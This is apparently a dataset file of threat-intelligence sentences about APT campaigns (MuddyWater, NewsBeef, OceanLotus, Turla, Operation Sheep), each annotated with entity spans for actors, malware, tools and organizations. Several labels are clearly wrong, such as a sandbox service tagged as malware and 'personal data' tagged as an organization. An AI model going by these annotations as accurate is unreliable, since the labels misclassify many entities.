{"text": "These findings also suggest that the threat groups have robust exploit developing capabilities because CVE-2018-0798 is not widely reported on and it is typically not incorporated into publicly available weaponizers .", "spans": {"THREAT_ACTOR: threat groups": [[37, 50]], "VULNERABILITY: CVE-2018-0798": [[103, 116]]}, "info": {"id": "dnrti_train_002841", "source": "dnrti_train"}}
{"text": "In addition , a current ANY.RUN playback of our observed Elise infection is also available .", "spans": {"MALWARE: ANY.RUN": [[24, 31]], "MALWARE: Elise": [[57, 62]]}, "info": {"id": "dnrti_train_002842", "source": "dnrti_train"}}
{"text": "Most recently though , a new campaign , targeting Belarus , Turkey and Ukraine , has emerged that caught the attention of Check Point researchers .", "spans": {"ORGANIZATION: Check Point": [[122, 133]]}, "info": {"id": "dnrti_train_002845", "source": "dnrti_train"}}
{"text": "The well-crafted and socially engineered malicious documents then become the first stage of a long and mainly fileless infection chain that eventually delivers POWERSTATS , a signature PowerShell backdoor of this threat group .", "spans": {"MALWARE: POWERSTATS": [[158, 168]], "MALWARE: PowerShell backdoor": [[183, 202]], "THREAT_ACTOR: threat group": [[211, 223]]}, "info": {"id": "dnrti_train_002846", "source": "dnrti_train"}}
{"text": "If the macros in SPK KANUN DEĞİŞİKLİĞİ GİB GÖRÜŞÜ.doc” are enabled , an embedded payload is decoded and saved in the %APPDATA% directory with the name CiscoAny.exe” .", "spans": {"MALWARE: SPK KANUN": [[17, 26]], "MALWARE: CiscoAny.exe”": [[151, 164]]}, "info": {"id": "dnrti_train_002848", "source": "dnrti_train"}}
{"text": "INF files have been used in the past by MuddyWater , although they were launched using Advpack.dll and not IEAdvpack.dll .", "spans": {"TOOL: INF files": [[0, 8]], "THREAT_ACTOR: MuddyWater": [[39, 49]], "TOOL: Advpack.dll": [[86, 97]], "TOOL: IEAdvpack.dll": [[106, 119]]}, "info": {"id": "dnrti_train_002849", "source": "dnrti_train"}}
{"text": "Although it has focused most of its efforts on the Middle East region , the political affiliations , motives and purposes behind MuddyWater’s attacks are not very well- defined , thus earning it its name .", "spans": {"THREAT_ACTOR: MuddyWater’s": [[128, 140]]}, "info": {"id": "dnrti_train_002851", "source": "dnrti_train"}}
{"text": "In the past , countries such as Saudi Arabia , the UAE and Turkey have been a MuddyWater's main target , but the campaigns have also reached a much wider audience , making their way to victims in countries such as Belarus and Ukraine .", "spans": {"THREAT_ACTOR: MuddyWater's": [[78, 90]]}, "info": {"id": "dnrti_train_002852", "source": "dnrti_train"}}
{"text": "MuddyWater target groups across Middle East and Central Asia , primarily using spear phishing emails with malicious attachments .", "spans": {"THREAT_ACTOR: MuddyWater": [[0, 10]]}, "info": {"id": "dnrti_train_002853", "source": "dnrti_train"}}
{"text": "Most recently MuddyWater were connected to a campaign in March that targeted organizations in Turkey , Pakistan , and Tajikistan .", "spans": {"THREAT_ACTOR: MuddyWater": [[14, 24]]}, "info": {"id": "dnrti_train_002854", "source": "dnrti_train"}}
{"text": "The group has been quite visible since the initial 2017 Malwarebytes report on their elaborate espionage attack against the Saudi Arabian government .", "spans": {"THREAT_ACTOR: group": [[4, 9]]}, "info": {"id": "dnrti_train_002855", "source": "dnrti_train"}}
{"text": "Our analysis revealed that they drop a new backdoor , which is written in PowerShell as MuddyWater’s known POWERSTATS backdoor .", "spans": {"THREAT_ACTOR: MuddyWater’s": [[88, 100]], "TOOL: POWERSTATS backdoor": [[107, 126]]}, "info": {"id": "dnrti_train_002856", "source": "dnrti_train"}}
{"text": "We assume that RunPow stands for run PowerShell , ” and triggers the PowerShell code embedded inside the .dll file .", "spans": {"MALWARE: PowerShell": [[37, 47]], "MALWARE: .dll file": [[105, 114]]}, "info": {"id": "dnrti_train_002857", "source": "dnrti_train"}}
{"text": "This backdoor has some features similar to a previously discovered version of the Muddywater backdoor .", "spans": {"TOOL: backdoor": [[5, 13]], "THREAT_ACTOR: Muddywater": [[82, 92]]}, "info": {"id": "dnrti_train_002858", "source": "dnrti_train"}}
{"text": "Based on our analysis , we can confirm that MuddyWater target Turkish government organizations related to the finance and energy sectors .", "spans": {"THREAT_ACTOR: MuddyWater": [[44, 54]]}, "info": {"id": "dnrti_train_002859", "source": "dnrti_train"}}
{"text": "This is yet another similarity with previous MuddyWater campaigns , which were known to have targeted multiple Turkish government entities .", "spans": {"THREAT_ACTOR: MuddyWater": [[45, 55]]}, "info": {"id": "dnrti_train_002860", "source": "dnrti_train"}}
{"text": "The main delivery method of this type of backdoor is spear phishing emails or spam that uses social engineering to manipulate targets into enabling malicious documents .", "spans": {"MALWARE: backdoor": [[41, 49]]}, "info": {"id": "dnrti_train_002861", "source": "dnrti_train"}}
{"text": "Trend Micro™ Deep Discovery™ provides detection , in-depth analysis , and proactive response to today’s stealthy malware , and targeted attacks in real time .", "spans": {"ORGANIZATION: Trend Micro™": [[0, 12]], "THREAT_ACTOR: attacks": [[136, 143]]}, "info": {"id": "dnrti_train_002862", "source": "dnrti_train"}}
{"text": "MuddyWater first surfaced in 2017 .", "spans": {"THREAT_ACTOR: MuddyWater": [[0, 10]]}, "info": {"id": "dnrti_train_002863", "source": "dnrti_train"}}
{"text": "First stage infections and graphical decoys have been described by multiple sources , including in our previous research MuddyWater expands operations .", "spans": {"THREAT_ACTOR: MuddyWater": [[121, 131]]}, "info": {"id": "dnrti_train_002864", "source": "dnrti_train"}}
{"text": "MuddyWater compiles various offensive Python scripts .", "spans": {"THREAT_ACTOR: MuddyWater": [[0, 10]], "TOOL: Python": [[38, 44]], "TOOL: scripts": [[45, 52]]}, "info": {"id": "dnrti_train_002865", "source": "dnrti_train"}}
{"text": "This includes Python scripts .", "spans": {}, "info": {"id": "dnrti_train_002866", "source": "dnrti_train"}}
{"text": "Usually , the Stageless Meterpreter has the Ext_server_stdapi.x64.dll” , Ext_server_extapi.x64.dll” , and Ext_server_espia.x64.dll” extensions .", "spans": {"MALWARE: Stageless Meterpreter": [[14, 35]], "MALWARE: Ext_server_stdapi.x64.dll”": [[44, 70]], "MALWARE: Ext_server_extapi.x64.dll”": [[73, 99]], "MALWARE: Ext_server_espia.x64.dll”": [[106, 131]]}, "info": {"id": "dnrti_train_002867", "source": "dnrti_train"}}
{"text": "The January 2017 report followed up on other private reports published on the group’s BeEF-related activity in 2015 and 2016 .", "spans": {"THREAT_ACTOR: BeEF-related": [[86, 98]]}, "info": {"id": "dnrti_train_002868", "source": "dnrti_train"}}
{"text": "Previous analysis of the NewsBeef APT indicates that the group focuses on Saudi Arabian (SA) and Western targets , and lacks advanced offensive technology development capabilities .", "spans": {"THREAT_ACTOR: NewsBeef": [[25, 33]]}, "info": {"id": "dnrti_train_002869", "source": "dnrti_train"}}
{"text": "However , in the summer of 2016 , NewsBeef deployed a new toolset that includes macro-enabled Office documents , PowerSploit , and the Pupy backdoor .", "spans": {"THREAT_ACTOR: NewsBeef": [[34, 42]], "TOOL: macro-enabled Office documents": [[80, 110]], "TOOL: PowerSploit": [[113, 124]], "TOOL: Pupy backdoor": [[135, 148]]}, "info": {"id": "dnrti_train_002870", "source": "dnrti_train"}}
{"text": "The most recent NewsBeef campaign uses this toolset in conjunction with spearphishing emails , links sent over social media/standalone private messaging applications , and watering hole attacks that leverage compromised high-profile websites some belonging to the SA government .", "spans": {"THREAT_ACTOR: NewsBeef": [[16, 24]]}, "info": {"id": "dnrti_train_002871", "source": "dnrti_train"}}
{"text": "The NewsBeef actor deployed a new toolset in a campaign that focused primarily on Saudi Arabian targets .", "spans": {"THREAT_ACTOR: NewsBeef": [[4, 12]]}, "info": {"id": "dnrti_train_002872", "source": "dnrti_train"}}
{"text": "NewsBeef continues to deploy malicious macro-enabled Office documents , poisoned legitimate Flash and Chrome installers , PowerSploit , and Pupy tools .", "spans": {"THREAT_ACTOR: NewsBeef": [[0, 8]], "TOOL: Flash": [[92, 97]], "TOOL: Chrome installers": [[102, 119]], "TOOL: PowerSploit": [[122, 133]], "TOOL: Pupy tools": [[140, 150]]}, "info": {"id": "dnrti_train_002873", "source": "dnrti_train"}}
{"text": "The NewsBeef campaign is divided into two main attack vectors , spearphishing and strategic web compromise watering hole attacks .", "spans": {"THREAT_ACTOR: NewsBeef": [[4, 12]]}, "info": {"id": "dnrti_train_002874", "source": "dnrti_train"}}
{"text": "On December 25 , 2016 , the NewsBeef APT stood up a server to host a new set of Microsoft Office documents (maintaining malicious macros and PowerShell scripts) to support its spear-phishing operations .", "spans": {"THREAT_ACTOR: NewsBeef": [[28, 36]]}, "info": {"id": "dnrti_train_002875", "source": "dnrti_train"}}
{"text": "These compromised servers include Saudi Arabian government servers and other high-value organizational identities relevant to NewsBeef's targets .", "spans": {"THREAT_ACTOR: NewsBeef's": [[126, 136]]}, "info": {"id": "dnrti_train_002876", "source": "dnrti_train"}}
{"text": "However , Kaspersky Security Network (KSN) records also contain links that victims clicked from the Outlook web client outlook.live.com” as well as attachments arriving through the Outlook desktop application .", "spans": {"ORGANIZATION: Kaspersky": [[10, 19]], "MALWARE: outlook.live.com”": [[119, 136]]}, "info": {"id": "dnrti_train_002877", "source": "dnrti_train"}}
{"text": "Interestingly , NewsBeef set up its server using the hosting provider Choopa , LLC , US” , the same hosting provider that the group used in attacks over the summer of 2016 .", "spans": {"THREAT_ACTOR: NewsBeef": [[16, 24]], "TOOL: Choopa": [[70, 76]], "TOOL: LLC": [[79, 82]], "TOOL: US”": [[85, 88]]}, "info": {"id": "dnrti_train_002878", "source": "dnrti_train"}}
{"text": "NTG’s IT focus and client list likely aided NewsBeef’s delivery of malicious PowerShell-enabled Office documents and poisoned installers .", "spans": {"ORGANIZATION: NTG’s": [[0, 5]], "THREAT_ACTOR: NewsBeef’s": [[44, 54]]}, "info": {"id": "dnrti_train_002879", "source": "dnrti_train"}}
{"text": "In other schemes , NewsBeef sent macro-enabled Office attachments from spoofed law firm identities or other relevant service providers to targets in SA .", "spans": {"THREAT_ACTOR: NewsBeef": [[19, 27]]}, "info": {"id": "dnrti_train_002880", "source": "dnrti_train"}}
{"text": "The law firm in this scheme is based in the United Kingdom and is the sole location for targets outside of SA for this campaign .", "spans": {"THREAT_ACTOR: targets": [[88, 95]]}, "info": {"id": "dnrti_train_002881", "source": "dnrti_train"}}
{"text": "Starting in October 2016 , NewsBeef compromised a set of legitimate servers (shown below) , and injected JavaScript to redirect visitors to http://analytics-google.org:69/Check.aspx .", "spans": {"THREAT_ACTOR: NewsBeef": [[27, 35]]}, "info": {"id": "dnrti_train_002882", "source": "dnrti_train"}}
{"text": "For example , on a Saudi government website , the NewsBeef APT delivered packed JavaScript into the bottom of a referenced script that is included in every page served from the site the packed and unpacked JavaScript is shown below .", "spans": {"THREAT_ACTOR: NewsBeef": [[50, 58]], "TOOL: JavaScript": [[206, 216]]}, "info": {"id": "dnrti_train_002883", "source": "dnrti_train"}}
{"text": "A high volume of redirections from the compromised site continues into mid-January 2017 .", "spans": {"THREAT_ACTOR: redirections": [[17, 29]]}, "info": {"id": "dnrti_train_002885", "source": "dnrti_train"}}
{"text": "However , as this recent campaign indicates , the NewsBeef APT appears to have shifted its intrusion toolset away from BeEF and towards macro-enabled malicious Office documents , PowerSploit , and Pupy .", "spans": {"THREAT_ACTOR: NewsBeef": [[50, 58]], "TOOL: Office documents": [[160, 176]], "TOOL: PowerSploit": [[179, 190]], "TOOL: Pupy": [[197, 201]]}, "info": {"id": "dnrti_train_002886", "source": "dnrti_train"}}
{"text": "Despite this shift in toolset , the group still relies on old infrastructure as evidenced by their reuse of servers hosted by the service providers Choopa and Atlantic.net .", "spans": {}, "info": {"id": "dnrti_train_002887", "source": "dnrti_train"}}
{"text": "Its attack activities can be traced back to April 2012 .", "spans": {}, "info": {"id": "dnrti_train_002888", "source": "dnrti_train"}}
{"text": "The OceanLotus reflects a very strong confrontational ability and willing to attack by keep evolving their techniques .", "spans": {"THREAT_ACTOR: OceanLotus": [[4, 14]]}, "info": {"id": "dnrti_train_002889", "source": "dnrti_train"}}
{"text": "These APT attacks and adopting confrontation measures will exist for a long time .", "spans": {"THREAT_ACTOR: APT": [[6, 9]], "ORGANIZATION: adopting confrontation measures": [[22, 53]]}, "info": {"id": "dnrti_train_002890", "source": "dnrti_train"}}
{"text": "OceanLotus’ targets are global .", "spans": {"THREAT_ACTOR: OceanLotus’": [[0, 11]]}, "info": {"id": "dnrti_train_002891", "source": "dnrti_train"}}
{"text": "OceanLotus have been actively using since at least early 2018 .", "spans": {"THREAT_ACTOR: OceanLotus": [[0, 10]]}, "info": {"id": "dnrti_train_002892", "source": "dnrti_train"}}
{"text": "OceanLotus malware family samples used no earlier than 2017 .", "spans": {"THREAT_ACTOR: OceanLotus": [[0, 10]]}, "info": {"id": "dnrti_train_002893", "source": "dnrti_train"}}
{"text": "We identified two methods to deliver the KerrDown downloader to targets .", "spans": {"ORGANIZATION: We": [[0, 2]], "MALWARE: KerrDown": [[41, 49]]}, "info": {"id": "dnrti_train_002894", "source": "dnrti_train"}}
{"text": "The link to the final payload of KerrDown was still active during the time of analysis and hence we were able to download a copy which turned out to be a variant of Cobalt Strike Beacon .", "spans": {"MALWARE: KerrDown": [[33, 41]], "ORGANIZATION: we": [[97, 99]]}, "info": {"id": "dnrti_train_002895", "source": "dnrti_train"}}
{"text": "While investigating KerrDown we found multiple RAR files containing a variant of the malware .", "spans": {"MALWARE: KerrDown": [[20, 28]], "ORGANIZATION: we": [[29, 31]]}, "info": {"id": "dnrti_train_002896", "source": "dnrti_train"}}
{"text": "Therefore , it is clear that the OceanLotus group works during weekdays and takes a break during the weekends .", "spans": {"THREAT_ACTOR: OceanLotus": [[33, 43]]}, "info": {"id": "dnrti_train_002897", "source": "dnrti_train"}}
{"text": "The group was first revealed and named by SkyEye Team in May 2015 .", "spans": {"THREAT_ACTOR: group": [[4, 9]]}, "info": {"id": "dnrti_train_002898", "source": "dnrti_train"}}
{"text": "OceanLotus's targets include China's maritime institutions , maritime construction , scientific research institutes and shipping enterprises .", "spans": {"THREAT_ACTOR: OceanLotus's": [[0, 12]], "ORGANIZATION: maritime institutions": [[37, 58]], "ORGANIZATION: maritime construction": [[61, 82]], "ORGANIZATION: scientific research institutes": [[85, 115]], "ORGANIZATION: shipping enterprises": [[120, 140]]}, "info": {"id": "dnrti_train_002899", "source": "dnrti_train"}}
{"text": "RedDrip Team (formerly SkyEye Team) has been to OceanLotus to keep track of high strength , groupactivity , found it in the near future to Indochinese Peninsula countries since 2019 On April 1 , 2019 , RedDrip discovered a Vietnamese file name Hop dong sungroup.rar in the process of daily monitoring the attack activities of the OceanLotus .", "spans": {"THREAT_ACTOR: OceanLotus": [[48, 58], [330, 340]], "ORGANIZATION: RedDrip": [[202, 209]]}, "info": {"id": "dnrti_train_002900", "source": "dnrti_train"}}
{"text": "COCCOC is a Vietnam was founded in 2013 .", "spans": {"THREAT_ACTOR: COCCOC": [[0, 6]]}, "info": {"id": "dnrti_train_002901", "source": "dnrti_train"}}
{"text": "In fact , according to reports of various security vendors , OceanLotus also attacked several countries , including Cambodia , Thailand , Laos , even some victims in Vietnam , like opinion leaders , media , real estate companies , foreign enterprises and banks .", "spans": {"THREAT_ACTOR: OceanLotus": [[61, 71]]}, "info": {"id": "dnrti_train_002902", "source": "dnrti_train"}}
{"text": "Unlike the 2016 variants of Ratsnif that stored all packets to a PCAP file .", "spans": {"THREAT_ACTOR: Ratsnif": [[28, 35]]}, "info": {"id": "dnrti_train_002903", "source": "dnrti_train"}}
{"text": "these threat actors targeted a number of government agencies Threat actors targeted a number of government agencies in East Asia .", "spans": {"THREAT_ACTOR: Threat actors": [[61, 74]]}, "info": {"id": "dnrti_train_002904", "source": "dnrti_train"}}
{"text": "Attackers relied on Microsoft Equation Editor exploit CVE-2018-0798 to deliver a custom malware that Proofpoint researchers have dubbed Cotx RAT .", "spans": {"THREAT_ACTOR: Attackers": [[0, 9]], "VULNERABILITY: CVE-2018-0798": [[54, 67]]}, "info": {"id": "dnrti_train_002905", "source": "dnrti_train"}}
{"text": "Maudi Surveillance Operation which was previously reported in 2013 .", "spans": {"THREAT_ACTOR: Maudi": [[0, 5]]}, "info": {"id": "dnrti_train_002906", "source": "dnrti_train"}}
{"text": "specifically CVE-2018-0798 , before downloading subsequent payloads .", "spans": {"VULNERABILITY: CVE-2018-0798": [[13, 26]]}, "info": {"id": "dnrti_train_002907", "source": "dnrti_train"}}
{"text": "The dropped PE file has the distinctive file name 8.t” .", "spans": {"TOOL: PE": [[12, 14]], "MALWARE: 8.t”": [[50, 54]]}, "info": {"id": "dnrti_train_002908", "source": "dnrti_train"}}
{"text": "The last process is utilized as part of the loading process for Cotx RAT and involves the legitimate Symantec binary noted above .", "spans": {"THREAT_ACTOR: Cotx RAT": [[64, 72]], "ORGANIZATION: Symantec": [[101, 109]]}, "info": {"id": "dnrti_train_002909", "source": "dnrti_train"}}
{"text": "These conflicts have even resulted in Haftar leading an attack on the capital city in April .", "spans": {"THREAT_ACTOR: Haftar": [[38, 44]]}, "info": {"id": "dnrti_train_002910", "source": "dnrti_train"}}
{"text": "The attackers have targeted a large number of organizations globally since early 2017 .", "spans": {"THREAT_ACTOR: attackers": [[4, 13]]}, "info": {"id": "dnrti_train_002911", "source": "dnrti_train"}}
{"text": "Attackers were initially discovered while investigating a phishing attack that targeted political figures in the MENA region .", "spans": {"THREAT_ACTOR: Attackers": [[0, 9]]}, "info": {"id": "dnrti_train_002912", "source": "dnrti_train"}}
{"text": "Group's targets include high-profile entities such as parliaments , senates , top state offices and officials , political science scholars , military and intelligence agencies , ministries , media outlets , research centers , election commissions , Olympic organizations , large trading companies , and other unknown entities .", "spans": {"THREAT_ACTOR: Group's": [[0, 7]], "ORGANIZATION: parliaments": [[54, 65]], "ORGANIZATION: senates": [[68, 75]], "ORGANIZATION: top state offices": [[78, 95]], "ORGANIZATION: officials": [[100, 109]], "ORGANIZATION: political science scholars": [[112, 138]], "ORGANIZATION: intelligence agencies": [[154, 175]], "ORGANIZATION: election commissions": [[226, 246]], "ORGANIZATION: Olympic organizations": [[249, 270]], "ORGANIZATION: trading companies": [[279, 296]], "ORGANIZATION: unknown entities": [[309, 325]]}, "info": {"id": "dnrti_train_002913", "source": "dnrti_train"}}
{"text": "Cisco Talos recently published a blogpost describing targeted attacks in the Middle East region which we believe may be connected .", "spans": {"ORGANIZATION: Cisco Talos": [[0, 11]]}, "info": {"id": "dnrti_train_002914", "source": "dnrti_train"}}
{"text": "Operation Parliament appears to be another symptom of escalating tensions in the Middle East region .", "spans": {"THREAT_ACTOR: Operation Parliament": [[0, 20]]}, "info": {"id": "dnrti_train_002915", "source": "dnrti_train"}}
{"text": "The attackers have taken great care to stay under the radar , imitating another attack group in the region .", "spans": {"THREAT_ACTOR: attackers": [[4, 13]]}, "info": {"id": "dnrti_train_002916", "source": "dnrti_train"}}
{"text": "With deception and false flags increasingly being employed by threat actors , attribution is a hard and complicated task that requires solid evidence , especially in complex regions such as the Middle East .", "spans": {"THREAT_ACTOR: threat actors": [[62, 75]]}, "info": {"id": "dnrti_train_002917", "source": "dnrti_train"}}
{"text": "We refer to this campaign and the associated actor as Operation Kingphish Malik” , in one of its written forms in Arabic , translates to King” .", "spans": {"THREAT_ACTOR: Operation Kingphish": [[54, 73]]}, "info": {"id": "dnrti_train_002922", "source": "dnrti_train"}}
{"text": "It is worth noting that in December 2016 , Amnesty International published an investigation into another social engineering campaign perpetrated by a seemingly fake human rights organization known as Voiceless Victims , which targeted international human rights and labour rights organizations campaigning on migrant workers’ rights in Qatar .", "spans": {"THREAT_ACTOR: Voiceless": [[200, 209]]}, "info": {"id": "dnrti_train_002923", "source": "dnrti_train"}}
{"text": "In the course of this email correspondence , the attacker — Safeena” — then sent what appeared to be invitations to access several documents on Google Drive .", "spans": {"THREAT_ACTOR: attacker": [[49, 57]]}, "info": {"id": "dnrti_train_002925", "source": "dnrti_train"}}
{"text": "The attackers were meticulous in making their phishing page as credible as possible .", "spans": {"THREAT_ACTOR: attackers": [[4, 13]]}, "info": {"id": "dnrti_train_002926", "source": "dnrti_train"}}
{"text": "Among the targets of this campaign is the International Trade Union Confederation (ITUC) .", "spans": {"ORGANIZATION: Trade Union Confederation": [[56, 81]]}, "info": {"id": "dnrti_train_002927", "source": "dnrti_train"}}
{"text": "Both in the attacks against ITUC and in other occasions , Operation Kingphish approached selected targets over social media , prominently Facebook , and engaged in chat conversations with them on and off , sometimes over a period of several months .", "spans": {"ORGANIZATION: ITUC": [[28, 32]], "THREAT_ACTOR: Operation Kingphish": [[58, 77]], "TOOL: social media": [[111, 123]], "TOOL: prominently Facebook": [[126, 146]]}, "info": {"id": "dnrti_train_002928", "source": "dnrti_train"}}
{"text": "This time the document purported to be about the involvement of the Emir of Qatar in funding ISIS , which was seemingly copied from a website critical of Qatar .", "spans": {"MALWARE: document": [[14, 22]]}, "info": {"id": "dnrti_train_002929", "source": "dnrti_train"}}
{"text": "While there is a clear underlying Qatar migrant workers theme in Operation Sheep , it is also hypothetically possible that these attacks could have been perpetrated by a malicious actor affiliated to a different government with an interest in damaging the reputation of the State of Qatar .", "spans": {"THREAT_ACTOR: Operation Sheep": [[65, 80]]}, "info": {"id": "dnrti_train_002930", "source": "dnrti_train"}}
{"text": "The SDK , named SWAnalytics is integrated into seemingly innocent Android applications published on major 3rd party Chinese app stores such as Tencent MyApp , Wandoujia , Huawei App Store , and Xiaomi App Store .", "spans": {"TOOL: SDK": [[4, 7]], "MALWARE: SWAnalytics": [[16, 27]]}, "info": {"id": "dnrti_train_002932", "source": "dnrti_train"}}
{"text": "This paper will cover the discovery of this campaign , dubbed ‘Operation Sheep’ , and an analysis of SWAnalytics .", "spans": {"THREAT_ACTOR: ‘Operation Sheep’": [[62, 79]]}, "info": {"id": "dnrti_train_002936", "source": "dnrti_train"}}
{"text": "In mid-September , an app named ‘Network Speed Master’ stood out on our radar with its rather unusual behavior patterns .", "spans": {"THREAT_ACTOR: ‘Network Speed Master’": [[32, 54]]}, "info": {"id": "dnrti_train_002937", "source": "dnrti_train"}}
{"text": "From our first malicious sample encounter back in mid-September until now , we have observed 12 infected applications , the majority of which are in the system utility category .", "spans": {"MALWARE: malicious sample": [[15, 31]]}, "info": {"id": "dnrti_train_002941", "source": "dnrti_train"}}
{"text": "Operation Sheep is the first campaign we have observed in the wild that abuses similar concept since our MitD publication .", "spans": {"THREAT_ACTOR: Operation Sheep": [[0, 15]]}, "info": {"id": "dnrti_train_002943", "source": "dnrti_train"}}
{"text": "Whenever users reboot their device or open up Network Speed Master , SWAnalytics will fetch the latest configuration file from http[:]//mbl[.]shunwang[.]com/cfg/config[.]json” .", "spans": {"MALWARE: SWAnalytics": [[69, 80]]}, "info": {"id": "dnrti_train_002945", "source": "dnrti_train"}}
{"text": "In order to understand SWAnalytics’ impact , we turned to public download volume data available on Chandashi , one of the app store optimization vendors specialized in Chinese mobile application markets .", "spans": {"MALWARE: SWAnalytics’": [[23, 35]]}, "info": {"id": "dnrti_train_002946", "source": "dnrti_train"}}
{"text": "Data points span from September 2018 to January 2019 where we observed over 17 million downloads in just five months .", "spans": {"ORGANIZATION: we": [[59, 61]]}, "info": {"id": "dnrti_train_002947", "source": "dnrti_train"}}
{"text": "In China alone , we have seen underground market sheep shavers” ported SMS rogue marketing strategy to spread Alipay Red Packet referral URL links .", "spans": {"THREAT_ACTOR: sheep shavers”": [[49, 63]]}, "info": {"id": "dnrti_train_002948", "source": "dnrti_train"}}
{"text": "According to Cheetah Mobile’s follow-up investigation , fraudulent behaviors came from two 3rd party SDKs Batmobi , Duapps integrated inside Cheetah SDK .", "spans": {"MALWARE: Batmobi": [[106, 113]], "MALWARE: Duapps": [[116, 122]], "MALWARE: Cheetah SDK": [[141, 152]]}, "info": {"id": "dnrti_train_002950", "source": "dnrti_train"}}
{"text": "It is likely a new campaign or actor started using Panda Banker since in addition to the previously unseen Japanese targeting , Arbor has not seen any indicator of compromise (IOC) overlaps with previous Panda Banker campaigns .", "spans": {"THREAT_ACTOR: actor": [[31, 36]], "TOOL: Panda Banker": [[51, 63]], "ORGANIZATION: Arbor": [[128, 133]], "MALWARE: Panda Banker": [[204, 216]]}, "info": {"id": "dnrti_train_002951", "source": "dnrti_train"}}
{"text": "Webinjects targeting Japan , a country we haven’t seen targeted by Panda Banker before .", "spans": {"MALWARE: Panda Banker": [[67, 79]]}, "info": {"id": "dnrti_train_002952", "source": "dnrti_train"}}
{"text": "Japan is no stranger to banking malware .", "spans": {"MALWARE: banking": [[24, 31]], "MALWARE: malware": [[32, 39]]}, "info": {"id": "dnrti_train_002953", "source": "dnrti_train"}}
{"text": "Based on recent reports , the country has been plagued by attacks using the Ursnif and Urlzone banking malware .", "spans": {"MALWARE: Ursnif": [[76, 82]], "MALWARE: Urlzone": [[87, 94]]}, "info": {"id": "dnrti_train_002954", "source": "dnrti_train"}}
{"text": "This post was our first analysis of the first Panda Banker campaign that we’ve seen to target financial institutions in Japan .", "spans": {"MALWARE: Panda Banker": [[46, 58]]}, "info": {"id": "dnrti_train_002955", "source": "dnrti_train"}}
{"text": "Operation Pawn Storm is an active economic and political cyber-espionage operation that targets a wide range of entities , like the military , governments , defense industries , and the media .", "spans": {"THREAT_ACTOR: Operation Pawn Storm": [[0, 20]]}, "info": {"id": "dnrti_train_002956", "source": "dnrti_train"}}
{"text": "We believe the iOS malware gets installed on already compromised systems , and it is very similar to next stage SEDNIT malware we have found for Microsoft Windows’ systems .", "spans": {"ORGANIZATION: We": [[0, 2]], "MALWARE: SEDNIT": [[112, 118]]}, "info": {"id": "dnrti_train_002957", "source": "dnrti_train"}}
{"text": "We found two malicious iOS applications in Operation Pawn Storm .", "spans": {"ORGANIZATION: We": [[0, 2]]}, "info": {"id": "dnrti_train_002958", "source": "dnrti_train"}}
{"text": "One is called XAgent detected as IOS_XAGENT.A and the other one uses the name of a legitimate iOS game , MadCap detected as IOS_ XAGENT.B .", "spans": {"MALWARE: XAgent": [[14, 20]], "MALWARE: IOS_XAGENT.A": [[33, 45]], "MALWARE: MadCap": [[105, 111]], "MALWARE: XAGENT.B": [[129, 137]]}, "info": {"id": "dnrti_train_002959", "source": "dnrti_train"}}
{"text": "The obvious goal of the SEDNIT-related spyware is to steal personal data , record audio , make screenshots , and send them to a remote command-and-control (C&C) server .", "spans": {"THREAT_ACTOR: SEDNIT-related": [[24, 38]], "ORGANIZATION: personal data": [[59, 72]]}, "info": {"id": "dnrti_train_002960", "source": "dnrti_train"}}
{"text": "Madcap” is similar to the XAgent malware , but the former is focused on recording audio .", "spans": {"MALWARE: Madcap”": [[0, 7]], "MALWARE: XAgent": [[26, 32]]}, "info": {"id": "dnrti_train_002961", "source": "dnrti_train"}}
{"text": "To learn more about this campaign , you may refer to our report , Operation Pawn Storm Using Decoys to Evade Detection .", "spans": {"THREAT_ACTOR: Evade Detection": [[103, 118]]}, "info": {"id": "dnrti_train_002962", "source": "dnrti_train"}}
{"text": "Additionally , we discovered a new DNS hijacking technique that we assess with moderate confidence is connected to the actors behind Sea Turtle .", "spans": {"THREAT_ACTOR: actors": [[119, 125]]}, "info": {"id": "dnrti_train_002963", "source": "dnrti_train"}}
{"text": "Talos now has moderate confidence that the threat actors behind Sea Turtle have been using another DNS hijacking technique .", "spans": {"ORGANIZATION: Talos": [[0, 5]]}, "info": {"id": "dnrti_train_002964", "source": "dnrti_train"}}
{"text": "This technique was also observed against a government organizations in the Middle East and North African region .", "spans": {}, "info": {"id": "dnrti_train_002965", "source": "dnrti_train"}}
{"text": "Cisco telemetry confirmed that the actors behind Sea Turtle maintained access to the ICS-Forth network from an operational command and control (C2) node .", "spans": {"ORGANIZATION: Cisco": [[0, 5]], "TOOL: control (C2)": [[135, 147]]}, "info": {"id": "dnrti_train_002966", "source": "dnrti_train"}}
{"text": "Our telemetry indicates that the actors maintained access in the ICS-Forth network through at least April 24 , five days after the statement was publicly released .", "spans": {"THREAT_ACTOR: actors": [[33, 39]]}, "info": {"id": "dnrti_train_002967", "source": "dnrti_train"}}
{"text": "This full-blown spying framework consists of two packages named ‘Tokyo’ and ‘Yokohama’ .", "spans": {"MALWARE: ‘Tokyo’": [[64, 71]], "MALWARE: ‘Yokohama’": [[76, 86]]}, "info": {"id": "dnrti_train_002968", "source": "dnrti_train"}}
{"text": "The first confirmed date when TajMahal samples were seen on a victim’s machine is August 2014 .", "spans": {"MALWARE: TajMahal": [[30, 38]]}, "info": {"id": "dnrti_train_002970", "source": "dnrti_train"}}
{"text": "More details about TajMahal are available to customers of the Kaspersky Intelligence Reporting service (contact intelreports@kaspersky.com) .", "spans": {"MALWARE: TajMahal": [[19, 27]], "ORGANIZATION: Kaspersky": [[62, 71]]}, "info": {"id": "dnrti_train_002971", "source": "dnrti_train"}}
{"text": "The dropper first appeared in mid-July , suggesting that this APT activity is potentially ongoing , with Turla actively targeting G20 participants and/or those with interest in the G20 , including member nations , journalists , and policymakers .", "spans": {"THREAT_ACTOR: Turla": [[105, 110]]}, "info": {"id": "dnrti_train_002972", "source": "dnrti_train"}}
{"text": "Turla is a well-documented , long operating APT group that is widely believed to be a Russian state-sponsored organization .", "spans": {"THREAT_ACTOR: Turla": [[0, 5]]}, "info": {"id": "dnrti_train_002973", "source": "dnrti_train"}}
{"text": "Turla is perhaps most notoriously suspected as responsible for the breach of the United States Central Command in 2008 .", "spans": {"THREAT_ACTOR: Turla": [[0, 5]]}, "info": {"id": "dnrti_train_002974", "source": "dnrti_train"}}
{"text": "More recently Turla was accused of breaching RUAG , a Swiss technology company , in a public report published by GovCERT.ch .", "spans": {"THREAT_ACTOR: Turla": [[14, 19]], "ORGANIZATION: RUAG": [[45, 49]], "ORGANIZATION: GovCERT.ch": [[113, 123]]}, "info": {"id": "dnrti_train_002975", "source": "dnrti_train"}}
